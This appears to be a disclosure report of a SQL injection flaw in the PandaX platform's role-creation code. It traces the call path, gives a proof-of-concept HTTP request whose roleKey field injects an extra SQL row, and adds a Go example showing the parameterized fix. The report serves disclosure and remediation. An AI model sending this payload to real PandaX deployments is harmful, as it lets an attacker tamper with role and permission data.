Here, where role information is modified:
PandaX/apps/system/router/role.go
Lines 49 to 61 in 3d26520
Execution enters one of the two functions InsertRole or UpdateRole:
PandaX/apps/system/api/role.go
Lines 51 to 82 in 3d26520
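It then enters r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds). The SQL statement here is built by string concatenation, without prepared statements, so SQL injection can be carried out through the concatenation.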
r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
PandaX/apps/system/services/role_menu.go
Lines 31 to 53 in 3d26520
Vulnerability verification
```http
POST http://127.0.0.1:7788/system/role HTTP/1.1
Host: 127.0.0.1:7788
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Origin: http://127.0.0.1:7788
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q
If-Modified-Since: Sat, 09 Mar 2024 08:08:22 GMT
Connection: close
Content-Length: 96

{"roleName":"11","roleKey":"tes12'),(114,514,'123');#","roleSort":2,"menuIds":[106],"apiIds":[]}
```
[fix] Use gorm object storage CreateInBatches
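An added example, not PandaX's own code, contrasting string concatenation with bind parameters for the kind of multi-row insert the issue describes. The table and column names, the function names, and the assumption that the role key is formatted into the statement are hypothetical; the roleKey value is the one from the request above.

```go
package main

import (
	"fmt"
	"strings"
)

// Hypothetical table and column names, assumed for this example.
const insertHead = "INSERT INTO sys_role_menus (role_id,menu_id,role_name) VALUES "

// buildConcat formats values straight into the SQL text, the pattern the
// issue reports: a quote inside roleKey ends the literal and adds SQL.
func buildConcat(roleID int64, roleKey string, menuIDs []int64) string {
	rows := make([]string, 0, len(menuIDs))
	for _, id := range menuIDs {
		rows = append(rows, fmt.Sprintf("(%d,%d,'%s')", roleID, id, roleKey))
	}
	return insertHead + strings.Join(rows, ",") + ";"
}

// buildParam emits placeholders only; values go to the driver as bind
// arguments, e.g. db.Exec(query, args...) in database/sql.
func buildParam(roleID int64, roleKey string, menuIDs []int64) (string, []interface{}) {
	if len(menuIDs) == 0 {
		return "", nil // nothing to insert; avoid emitting VALUES with no rows
	}
	rows := make([]string, 0, len(menuIDs))
	args := make([]interface{}, 0, 3*len(menuIDs))
	for _, id := range menuIDs {
		rows = append(rows, "(?,?,?)")
		args = append(args, roleID, id, roleKey)
	}
	return insertHead + strings.Join(rows, ","), args
}

func main() {
	// roleKey value taken from the request in the issue; role ID 7 is constructed.
	key := "tes12'),(114,514,'123');#"
	fmt.Println("concatenated: ", buildConcat(7, key, []int64{106}))
	q, args := buildParam(7, key, []int64{106})
	fmt.Println("parameterized:", q)
	fmt.Printf("bind args:     %#v\n", args)
}
```

In the concatenated form the role key changes the statement's structure by adding a second row tuple, while in the parameterized form the statement text is fixed and the same value is only data.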
pandax SQL injection